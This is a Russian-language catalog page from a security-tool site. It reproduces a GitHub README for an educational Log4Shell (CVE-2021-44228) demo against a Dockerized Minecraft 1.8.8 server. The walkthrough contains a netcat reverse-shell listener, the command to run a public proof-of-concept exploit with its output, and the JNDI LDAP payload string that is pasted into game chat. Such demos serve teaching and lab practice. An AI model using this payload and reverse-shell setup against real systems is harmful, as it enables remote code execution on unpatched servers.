Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4shell-minecraft-demo — Log4Shell (CVE-2021-44228) демо для Minecraft. Используется на образовательных ярмарках. | Kitploit
Инструменты/GitHubGitHub/felixslama/log4shell-minecraft-demo
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubfelixslama/log4shell-minecraft-demo

log4shell-minecraft-demo

Log4Shell (CVE-2021-44228) демо для Minecraft. Используется на образовательных ярмарках.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
12 лет назадЕщё не проверено

Log4Shell (CVE-2021-44228) демонстрация в Minecraft

Эта демонстрация используется на образовательных ярмарках, чтобы дать потенциальным будущим студентам представление о кафедре кибербезопасности HTL Villach и о том, как могут быть использованы повседневные приложения.

Примечание: Вся демонстрация использует Minecraft 1.8.8

Атакующий

В этом сценарии атакующий использует PoC от kozmer. https://github.com/kozmer/log4j-shell-poc Вся заслуга принадлежит им. Примечание: Все команды необходимо выполнять в директории attacker/

Требования:

root@kitploit:~
pip install -r requirements.txt

Использование:

  • Запустите netcat слушатель для приёма реверс-шелл соединения.
root@kitploit:~
nc -lvnp 9001
  • Запустите эксплойт.
    Примечание: Для работы извлечённый java-архив должен называться: jdk1.8.0_20 и находиться в той же директории.
root@kitploit:~
$ python3 poc.py --userip <ip докер-хоста> --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<ip докер-хоста>:1389/a}

Listening on 0.0.0.0:1389

Этот скрипт настроит для вас HTTP-сервер и LDAP-сервер, а также создаст полезную нагрузку, которую можно вставить в уязвимый параметр. После этого, если всё пройдёт успешно, вы должны получить шелл на указанном порту.


Жертва

На стороне жертвы мы используем устаревшую и, следовательно, уязвимую версию JDK (jdk1.8.0_20).

Начальная настройка

Чтобы запустить наш сервер Minecraft, мы должны собрать Docker-образ и запустить его.

Примечание: Для успешной сборки вам необходимо получить собственную копию сервера Minecraft Vanilla 1.8.8 (нельзя распространять из-за лицензионного соглашения Mojang) Возможный источник — MCVERSIONS.NET

После получения файла сохраните его в target/ как server.jar

root@kitploit:~
cd target/
docker build target/ -t minecraft-demo

Запуск уязвимого сервера

Запустите только что собранный уязвимый сервер Minecraft с помощью docker

root@kitploit:~
docker run --name vulnerable-server -p 25565:25565 minecraft-demo

Вероятно, после эксплуатации ваш контейнер зависнет или перестанет отвечать. В этом случае вы можете остановить его следующей командой:

root@kitploit:~
docker kill vulnerable-server

Эксплуатация сервера

Чтобы использовать уязвимость, просто отправьте строку, предоставленную poc.py, в игровой чат.

root@kitploit:~
${jndi:ldap://<ip докер-хоста>:1389/a}

image

Скачать инструмент